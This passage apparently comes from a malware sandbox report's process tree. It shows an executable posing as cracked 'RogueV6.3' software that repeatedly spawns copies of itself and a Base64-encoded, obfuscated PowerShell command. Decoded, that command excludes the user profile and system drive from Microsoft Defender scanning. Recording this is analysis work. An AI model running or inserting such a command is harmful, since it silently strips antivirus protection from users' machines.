        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        276⤵
        
        PID:2104
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        277⤵
        
        PID:5260
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        276⤵
        
        PID:9380
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        276⤵
        
        PID:5748
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        277⤵
        
        PID:7760
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        277⤵
        
        PID:9468
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        277⤵
        
        PID:9352
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        278⤵
        
        PID:2088
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        278⤵
        
        PID:10908
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        278⤵
        
        PID:7920
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        279⤵
        
        PID:9284
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        279⤵
        
        PID:9684
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        279⤵
        
        PID:9432
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        280⤵
        
        PID:10480
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        280⤵
        
        PID:9588
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        280⤵
        
        PID:11184
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        281⤵
        
        PID:10444
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        281⤵
        
        PID:9112
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        281⤵
        
        PID:7360
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        282⤵
        
        PID:5832
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        282⤵
        
        PID:9416
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        282⤵
        
        PID:7340
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        283⤵
        
        PID:10452
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        283⤵
        
        PID:11160
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        283⤵
        
        PID:4568
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        284⤵
        
        PID:10476
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        284⤵
        
        PID:8960
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        284⤵
        
        PID:11200
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        285⤵
        
        PID:2032
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        285⤵
        
        PID:2116
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        285⤵
        
        PID:5956
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        286⤵
        
        PID:8984
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        286⤵
        
        PID:7896
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        286⤵
        
        PID:7652
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        287⤵
        
        PID:4048
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        288⤵
        
        PID:8612
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        287⤵
        
        PID:2684
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        287⤵
        
        PID:7328
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        288⤵
        
        PID:8008
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        288⤵
        
        PID:4108
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        288⤵
        
        PID:9916
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        289⤵
        
        PID:4372
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        289⤵
        
        PID:1060
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        289⤵
        
        PID:7804
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        290⤵
        
        PID:8584
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        290⤵
        
        PID:5800
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        290⤵
        
        PID:7872
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        291⤵
        
        PID:10828
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        291⤵
        
        PID:8252
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        291⤵
        
        PID:3120
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        292⤵
        
        PID:10176
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        293⤵
        
        PID:5920
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        292⤵
        
        PID:4244
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        292⤵
        
        PID:10992
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        293⤵
        
        PID:5924
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        293⤵
        
        PID:10408
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        293⤵
        
        PID:7816
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        294⤵
        
        PID:10804
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        294⤵
        
        PID:3120
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        294⤵
        
        PID:9908
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        295⤵
        
        PID:6184
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        295⤵
        
        PID:10236
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        295⤵
        
        PID:10508
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        296⤵
        
        PID:10080
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        296⤵
        
        PID:9164
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        296⤵
        
        PID:1212
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        297⤵
        
        PID:10960
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        297⤵
        
        PID:3452
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        297⤵
        
        PID:420
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        298⤵
        
        PID:5188
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        298⤵
        
        PID:7252
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        298⤵
        
        PID:5236
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        299⤵
        
        PID:3620
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        299⤵
        
        PID:4552
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        299⤵
        
        PID:7320
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        300⤵
        
        PID:3456
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        300⤵
        
        PID:2356
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        300⤵
        
        PID:232
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        301⤵
        
        PID:9492
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        301⤵
        
        PID:11276
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        301⤵
        
        PID:11296
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        302⤵
        
        PID:11496
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        302⤵
        
        PID:11504
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        302⤵
        
        PID:11532
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
